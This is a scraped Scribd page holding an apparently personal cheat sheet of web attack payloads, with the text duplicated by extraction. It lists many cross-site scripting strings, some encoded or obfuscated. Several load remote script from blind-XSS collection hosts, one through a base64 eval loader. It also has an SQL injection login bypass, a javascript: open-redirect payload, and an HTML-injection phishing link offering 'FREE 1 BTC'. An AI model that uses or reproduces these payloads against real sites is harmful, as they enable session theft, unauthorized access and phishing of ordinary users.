Scribd
Upload
137 views3 pages

2022-11-22 PstylecolorredTESTp 2522253e253cscript253ealert0253c Unsigned

The document contains malicious JavaScript code and HTML tags that could be used to perform cross-site scripting (XSS) attacks by injecting client-side scripts. It includes script tags, iframes, and input fields with event handlers that could allow unauthorized access or modification of user data on vulnerable websites.

Uploaded by

deepak
Copyright
© Attribution Non-Commercial No-Derivs (BY-NC-ND)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
137 views3 pages

2022-11-22 PstylecolorredTESTp 2522253e253cscript253ealert0253c Unsigned

The document contains malicious JavaScript code and HTML tags that could be used to perform cross-site scripting (XSS) attacks by injecting client-side scripts. It includes script tags, iframes, and input fields with event handlers that could allow unauthorized access or modification of user data on vulnerable websites.

Uploaded by

deepak
Copyright
© Attribution Non-Commercial No-Derivs (BY-NC-ND)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

>҉😇Ÿ˜<҉ "><img

src=x onError="prompt(1)"><script >҉😇Ÿ˜<҉ "><img src=x onError="prompt(1)"><script


src=https://bugvsme.xss.ht></script> src=https://bugvsme.xss.ht></script>


? ?
utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xs


%2522%253e%253cscript%253ealert(0)%253c %2522%253e%253cscript%253ealert(0)%253c


" === %2522 " === %2522


------------------------------------ ------------------------------------


<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre> <pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre>

<base href=https://joaxcar.com> <base href=https://joaxcar.com>

<pre x=&#34;"> <pre x=&#34;">

<code></code></pre> <code></code></pre>


<iframe/srcdoc='<script/src=/joaxcar_group/first/- <iframe/srcdoc='<script/src=/joaxcar_group/first/-
/jobs/1415515489/artifacts/raw/data/alert.js></script>'> /jobs/1415515489/artifacts/raw/data/alert.js></script>'>
</iframe> </iframe>


-------------- --------------


%253Cscript%253Ealert('XSS')%253C%252Fscript%253E %253Cscript%253Ealert('XSS')%253C%252Fscript%253E


"> ">
<input%20tabindex=%221%22%20on%00mousemove=alert()%20onm%00ouseover=%22eval(atob(this.id))%22%20id=%22dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnVndnNtZS54c3MuaHQiO
<input%20tabindex=%221%22%20on%00mousemove=alert()%20onm%00


"><input type=image src=x onerror=alert()> "><input type=image src=x onerror=alert()>


"tabindex="1" onfocus="alert(1)" autofocus" "tabindex="1" onfocus="alert(1)" autofocus"


"><input onfocus=eval(atob(this.id)) "><input onfocus=eval(atob(this.id))
id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnVndnNtZS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7
id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcm
autofocus> autofocus>


\x3Cscript\x3E alert()\x3C/script\x3E \x3Cscript\x3E alert()\x3C/script\x3E


\x3Cscript\x3E src=https://bugvsme.xss.ht >\x3C/script\x3E \x3Cscript\x3E src=https://bugvsme.xss.ht >\x3C/script\x3E



/logout_redirect.do? /logout_redirect.do?
sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)" sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"


<p style="color:red">TEST.</p> <p style="color:red">TEST.</p>


😇Ÿ˜\"<img src=x onError=\"prompt(1)\"</img>😬<script 😇Ÿ˜\"<img src=x onError=\"prompt(1)\"</img>😬<script
src=https://bugvsme.xss.ht></script> src=https://bugvsme.xss.ht></script>


>҉😇Ÿ˜<҉ <img%20src=x%20onError="prompt(1)" "> >҉😇Ÿ˜<҉ <img%20src=x%20onError="prompt(1)" ">
<script%20src=https://bugvsme.xss.ht></script> <script%20src=https://bugvsme.xss.ht></script>


[![<img](https://www.linkpicture.com/q/get-started-button- [![<img](https://www.linkpicture.com/q/get-started-button-
1.svg)](https://www.linkpicture.com/q/34643474-rubber- 1.svg)](https://www.linkpicture.com/q/34643474-rubber-
stamp-with-text-do-not-open-inside-vector-illustration-1.svg) stamp-with-text-do-not-open-inside-vector-illustration-1.svg)


![<img](https://www.linkpicture.com/q/get-started-button- ![<img](https://www.linkpicture.com/q/get-started-button-
1.svg) 1.svg)


"><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1// "><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1//


😇Ÿ˜<img src="https://indxss.xss.ht" onError="prompt(1)" 😇Ÿ˜<img src="https://indxss.xss.ht" onError="prompt(1)"
</img>😬 </img>😬

<form id=x tabindex=0 onfocus=print()><input id=attributes> <form id=x tabindex=0 onfocus=print()><input id=attributes>

<iframe id="intercom-frame" style="position: absolute <iframe id="intercom-frame" style="position: absolute
!important; opacity: 0 !important; width: 1px !important; height: !important; opacity: 0 !important; width: 1px !important; height:
1px !important; top: 0 !important; left: 0 !important; border: 1px !important; top: 0 !important; left: 0 !important; border:
none !important; display: block !important; z-index: -1 none !important; display: block !important; z-index: -1
!important; pointer-events: none;" aria-hidden="true" !important; pointer-events: none;" aria-hidden="true"
tabindex="-1" title="Intercom"></iframe> tabindex="-1" title="Intercom"></iframe>


admin' or '1'='1 admin' or '1'='1


"<img/src="https://i.guim.co.uk/img/static/sys- "<img/src="https://i.guim.co.uk/img/static/sys-
images/Guardian/Pix/pictures/2015/11/17/1447761194020/7b368799- images/Guardian/Pix/pictures/2015/11/17/1447761194020/7b368799-
e441-47d7-a52c-2e43d0f985e6-2060x1236.jpeg? e441-47d7-a52c-2e43d0f985e6-2060x1236.jpeg?
width=465&quality=45&auto=format&fit=max&dpr=2&s=4c277ae5155e97ff072d7c5c9ede49cb" width=465&quality=45&auto=format&fit=max&dpr=2&s=4c277ae5155e97
</img> </img>


<b>HACKED</b> <b>HACKED</b>


"""```////>"<p><a href="https://i.guim.co.uk/img/static/sys- """```////>"<p><a href="https://i.guim.co.uk/img/static/sys-
images/Guardian/Pix/pictures/2015/11/17/1447761194020/7b368799- images/Guardian/Pix/pictures/2015/11/17/1447761194020/7b368799-
e441-47d7-a52c-2e43d0f985e6-2060x1236.jpeg? e441-47d7-a52c-2e43d0f985e6-2060x1236.jpeg?
width=465&quality=45&auto=format&fit=max&dpr=2&s=4c277ae5155e97ff072d7c5c9ede49cb" width=465&quality=45&auto=format&fit=max&dpr=2&s=4c277ae5155e97
target=\"iframe_a\">CLICK ME</a></p> target=\"iframe_a\">CLICK ME</a></p>


"<b><a href="https://airtel-wifi-firmware- "<b><a href="https://airtel-wifi-firmware-
upgrade.000webhostapp.com/test.html">CLICK HERE TO GET upgrade.000webhostapp.com/test.html">CLICK HERE TO GET
FREE 1 BTC</a></b> FREE 1 BTC</a></b>


HTML INJECTION HTML INJECTION


"<b><a href="https://airtel-wifi-firmware- "<b><a href="https://airtel-wifi-firmware-
upgrade.000webhostapp.com/test.html">CLICK HERE TO GET upgrade.000webhostapp.com/test.html">CLICK HERE TO GET
FREE 1 BTC</a></b> FREE 1 BTC</a></b>


USING THIS I CAN DO PHISHING ATTACK USING THIS I CAN DO PHISHING ATTACK


now user cant reply with image in comment section but i can now user cant reply with image in comment section but i can
see how see how


html injection DISABLE HTML TAG IN COMMENT SECTION html injection DISABLE HTML TAG IN COMMENT SECTION


THANKYOU THANKYOU

>҉😇Ÿ˜<҉ "><img src=x onError="prompt(1)"> >҉😇Ÿ˜<҉ "><img src=x onError="prompt(1)">


[email protected] [email protected]

[YYYY-MM-DD HH:MM] [YYYY-MM-DD HH:MM]


%2522%253e%253cscript%253ealert(0)%253c %2522%253e%253cscript%253ealert(0)%253c
[email protected] [email protected]

[YYYY-MM-DD HH:MM] [YYYY-MM-DD HH:MM]

You might also like